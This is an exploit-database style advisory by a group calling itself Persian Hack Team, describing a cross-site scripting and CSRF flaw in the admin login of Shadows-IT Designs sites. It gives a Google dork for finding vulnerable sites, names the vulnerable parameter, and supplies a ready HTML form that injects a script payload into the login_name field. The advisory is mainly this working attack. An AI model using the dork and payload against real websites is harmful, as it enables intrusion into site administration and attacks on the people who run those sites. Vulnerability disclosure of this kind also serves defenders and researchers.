######################
# Exploit Title : Shadows-IT Designs CSRF XSS
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.shadows-it.com/
# Google Dork : "intext:Powerd By Shadows-IT" inurl:?.php?page=
# Date: 2016/02/12
#
######################
# Vulnerable PHP File : /admin/index.php
# Vulnerable Parameter : login_name
# Exploit :
#
#<form action="http://site.com/admin/index.php?page=bG9naW4=&op=Y2hlY2s=" method="post" name="login_form" >
#<input class="EDIT_LABEL" type="text" value='"><script>alert(1)</script>"' name="login_name" >
#<input type="submit" name="button" value=" LogIn " class="Button" >
#</form>
#
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################